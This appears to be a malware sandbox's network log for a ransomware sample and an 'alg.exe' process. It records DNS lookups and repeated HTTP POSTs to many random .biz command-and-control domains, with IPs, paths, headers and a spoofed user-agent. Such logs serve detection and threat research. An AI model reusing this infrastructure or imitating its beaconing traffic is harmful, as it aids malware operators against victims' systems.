Set-Cookie: btst=1a0ae08c90dd92b7f14e102ce7b53a3a|194.110.13.70|1723257712|1723257712|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cikivjto.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

cikivjto.biz

IN A

Response

cikivjto.biz

IN A

44.213.104.86
POST

http://wxgzshna.biz/ncxgwcra

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

72.52.178.23:80

Request

POST /ncxgwcra HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://cikivjto.biz/o

alg.exe

Remote address:

44.213.104.86:80

Request

POST /o HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cikivjto.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=083dfdce233c614d93afd0e19e2b02e4|194.110.13.70|1723257713|1723257713|0|1|0; path=/; domain=.cikivjto.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zrlssa.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zrlssa.biz

IN A

Response

zrlssa.biz

IN A

44.221.84.105
POST

http://zrlssa.biz/glyaeqsxfxck

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /glyaeqsxfxck HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=51b26613a27046e28a03c905f8d72de1|194.110.13.70|1723257712|1723257712|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jlqltsjvh.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jlqltsjvh.biz

IN A

Response

jlqltsjvh.biz

IN A

18.141.10.107
DNS

jlqltsjvh.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jlqltsjvh.biz

IN A

Response

jlqltsjvh.biz

IN A

18.141.10.107
POST

http://jlqltsjvh.biz/omdjtrtffvh

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /omdjtrtffvh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0431325bd334404070ddadb8555c9310|194.110.13.70|1723257713|1723257713|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qncdaagct.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qncdaagct.biz

IN A

Response

qncdaagct.biz

IN A

47.129.31.212
DNS

qncdaagct.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qncdaagct.biz

IN A
POST

http://qncdaagct.biz/ega

alg.exe

Remote address:

47.129.31.212:80

Request

POST /ega HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qncdaagct.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=980ba906e8c64b86b4e636f4fa2a650b|194.110.13.70|1723257714|1723257714|0|1|0; path=/; domain=.qncdaagct.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xyrgy.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xyrgy.biz

IN A

Response

xyrgy.biz

IN A

18.208.156.248
DNS

xyrgy.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xyrgy.biz

IN A

Response

xyrgy.biz

IN A

18.208.156.248
POST

http://xyrgy.biz/cuoleqtrjcblluy

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /cuoleqtrjcblluy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=16fd0a9d29a63bd6c463cf7a4ce565fd|194.110.13.70|1723257714|1723257714|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

htwqzczce.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A

Response

htwqzczce.biz

IN A

172.234.222.143

htwqzczce.biz

IN A

172.234.222.138
POST

http://htwqzczce.biz/bhvtjlnoyx

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

172.234.222.143:80

Request

POST /bhvtjlnoyx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://htwqzczce.biz/uya

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

172.234.222.143:80

Request

POST /uya HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
DNS

shpwbsrw.biz

alg.exe

Remote address:

8.8.8.8:53

Request

shpwbsrw.biz

IN A

Response

shpwbsrw.biz

IN A

13.251.16.150
POST

http://shpwbsrw.biz/df

alg.exe

Remote address:

13.251.16.150:80

Request

POST /df HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: shpwbsrw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=31e1c1001311d6351ba39ac8432bd863|194.110.13.70|1723257715|1723257715|0|1|0; path=/; domain=.shpwbsrw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kvbjaur.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A

Response

kvbjaur.biz

IN A

54.244.188.177
DNS

kvbjaur.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A
POST

http://kvbjaur.biz/jxrtranvhdvr

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /jxrtranvhdvr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kvbjaur.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2709cd06599ba064d530c567cecbbf3f|194.110.13.70|1723257715|1723257715|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uphca.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uphca.biz

IN A

Response

uphca.biz

IN A

44.221.84.105
DNS

uphca.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uphca.biz

IN A

Response

uphca.biz

IN A

44.221.84.105
POST

http://uphca.biz/rtnrhhjhsrf

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /rtnrhhjhsrf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=aee12260162797034864a033126588bb|194.110.13.70|1723257715|1723257715|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cjvgcl.biz

alg.exe

Remote address:

8.8.8.8:53

Request

cjvgcl.biz

IN A

Response

cjvgcl.biz

IN A

18.208.156.248
POST

http://cjvgcl.biz/wggrsg

alg.exe

Remote address:

18.208.156.248:80

Request

POST /wggrsg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cjvgcl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=02328e267c5c288509ef3d555f2c1c63|194.110.13.70|1723257716|1723257716|0|1|0; path=/; domain=.cjvgcl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fjumtfnz.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

fjumtfnz.biz

IN A

Response

fjumtfnz.biz

IN A

34.211.97.45
DNS

fjumtfnz.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

fjumtfnz.biz

IN A

Response

fjumtfnz.biz

IN A

34.211.97.45
POST

http://fjumtfnz.biz/veppepsklmyyrtnd

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /veppepsklmyyrtnd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a49af7a132e26164190a2ab74286e1ca|194.110.13.70|1723257716|1723257716|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

neazudmrq.biz

alg.exe

Remote address:

8.8.8.8:53

Request

neazudmrq.biz

IN A

Response

neazudmrq.biz

IN A

44.221.84.105
POST

http://neazudmrq.biz/o

alg.exe

Remote address:

44.221.84.105:80

Request

POST /o HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: neazudmrq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b7fd2e82f11d506ade1c5f20a09fcebc|194.110.13.70|1723257716|1723257716|0|1|0; path=/; domain=.neazudmrq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pgfsvwx.biz

alg.exe

Remote address:

8.8.8.8:53

Request

pgfsvwx.biz

IN A

Response

pgfsvwx.biz

IN A

18.208.156.248
POST

http://pgfsvwx.biz/lapfyboolgtaavf

alg.exe

Remote address:

18.208.156.248:80

Request

POST /lapfyboolgtaavf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pgfsvwx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a440d9ccaed280563fe28a3c3a04dbfe|194.110.13.70|1723257716|1723257716|0|1|0; path=/; domain=.pgfsvwx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hlzfuyy.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hlzfuyy.biz

IN A

Response

hlzfuyy.biz

IN A

34.211.97.45
POST

http://hlzfuyy.biz/mgcjwdmxoufvmx

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /mgcjwdmxoufvmx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hlzfuyy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8485fbb1df136f0db181554c53d2d810|194.110.13.70|1723257716|1723257716|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

aatcwo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

aatcwo.biz

IN A

Response

aatcwo.biz

IN A

47.129.31.212
DNS

aatcwo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

aatcwo.biz

IN A

Response

aatcwo.biz

IN A

47.129.31.212
POST

http://aatcwo.biz/dlwnxuieic

alg.exe

Remote address:

47.129.31.212:80

Request

POST /dlwnxuieic HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: aatcwo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
DNS

rffxu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rffxu.biz

IN A

Response

rffxu.biz

IN A

34.246.200.160
DNS

rffxu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rffxu.biz

IN A

Response

rffxu.biz

IN A

34.246.200.160
POST

http://rffxu.biz/mtnbsqhu

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /mtnbsqhu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rffxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

54.244.188.177:80

http://pywolwnvd.biz/jravwygahngecv

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
659 B
6
6

HTTP Request

POST http://pywolwnvd.biz/jravwygahngecv

HTTP Response

200
54.244.188.177:80

http://pywolwnvd.biz/lireajgotnxkayy

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://pywolwnvd.biz/lireajgotnxkayy

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/adbrglrn

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
705 B
8
7

HTTP Request

POST http://ssbzmoy.biz/adbrglrn

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/vlahmlajbpanh

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://ssbzmoy.biz/vlahmlajbpanh

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/j

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
663 B
7
6

HTTP Request

POST http://cvgrf.biz/j

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/j

http

alg.exe

1.4kB
655 B
7
6

HTTP Request

POST http://cvgrf.biz/j

HTTP Response

200
13.107.21.237:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid=

tls, http2

2.0kB
9.3kB
21
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid=

HTTP Response

204
44.221.84.105:80

http://npukfztj.biz/pxestalrit

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://npukfztj.biz/pxestalrit

HTTP Response

200
44.221.84.105:80

http://npukfztj.biz/upfet

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://npukfztj.biz/upfet

HTTP Response

200
172.234.222.138:80

http://przvgke.biz/l

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
204 B
6
5

HTTP Request

POST http://przvgke.biz/l
172.234.222.138:80

http://przvgke.biz/qnragkryuoyh

http

alg.exe

1.4kB
124 B
6
3

HTTP Request

POST http://przvgke.biz/qnragkryuoyh
172.234.222.138:80

http://przvgke.biz/ms

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
204 B
6
5

HTTP Request

POST http://przvgke.biz/ms
172.234.222.138:80

http://przvgke.biz/ms

http

alg.exe

1.5kB
204 B
8
5

HTTP Request

POST http://przvgke.biz/ms
18.141.10.107:80

http://knjghuig.biz/vtivlyxnyxdprhwv

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
666 B
6
6

HTTP Request

POST http://knjghuig.biz/vtivlyxnyxdprhwv

HTTP Response

200
82.112.184.197:80

lpuegx.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

260 B
5
18.141.10.107:80

http://knjghuig.biz/jwncgojbqiyxqnoe

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://knjghuig.biz/jwncgojbqiyxqnoe

HTTP Response

200
82.112.184.197:80

lpuegx.biz

alg.exe

260 B
5
82.112.184.197:80

lpuegx.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

260 B
5
82.112.184.197:80

lpuegx.biz

alg.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

alg.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

alg.exe

260 B
5
47.129.31.212:80

http://xlfhhhm.biz/nh

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://xlfhhhm.biz/nh

HTTP Response

200
13.251.16.150:80

http://ifsaia.biz/cjhtqkidtbxyl

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://ifsaia.biz/cjhtqkidtbxyl

HTTP Response

200
44.221.84.105:80

http://saytjshyf.biz/p

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
667 B
6
6

HTTP Request

POST http://saytjshyf.biz/p

HTTP Response

200
18.141.10.107:80

http://vcddkls.biz/ndafyecfudrj

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://vcddkls.biz/ndafyecfudrj

HTTP Response

200
47.129.31.212:80

http://xlfhhhm.biz/cwjsf

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://xlfhhhm.biz/cwjsf

HTTP Response

200
172.234.222.143:80

http://fwiwk.biz/rspha

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
204 B
6
5

HTTP Request

POST http://fwiwk.biz/rspha
172.234.222.143:80

http://fwiwk.biz/owxtyxujfra

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
204 B
6
5

HTTP Request

POST http://fwiwk.biz/owxtyxujfra
13.251.16.150:80

http://ifsaia.biz/fifjxk

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://ifsaia.biz/fifjxk

HTTP Response

200
34.246.200.160:80

http://tbjrpv.biz/u

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://tbjrpv.biz/u

HTTP Response

200
44.221.84.105:80

http://saytjshyf.biz/ehaoi

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://saytjshyf.biz/ehaoi

HTTP Response

200
18.208.156.248:80

http://deoci.biz/rafbrexontksjth

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://deoci.biz/rafbrexontksjth

HTTP Response

200
18.141.10.107:80

http://vcddkls.biz/njwq

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://vcddkls.biz/njwq

HTTP Response

200
208.100.26.245:80

http://gjogvvpsf.biz/wkhdhutcptwaqv

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

9.7kB
5.8kB
19
14

HTTP Request

POST http://gytujflc.biz/jmmjwqredi

HTTP Response

404

HTTP Request

POST http://gytujflc.biz/fpuvoedfholdfds

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/hckibafbv

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/rhuhxxlslfjyrwd

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/xtwfv

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/wkhdhutcptwaqv

HTTP Response

404
13.251.16.150:80

http://qaynky.biz/paik

http

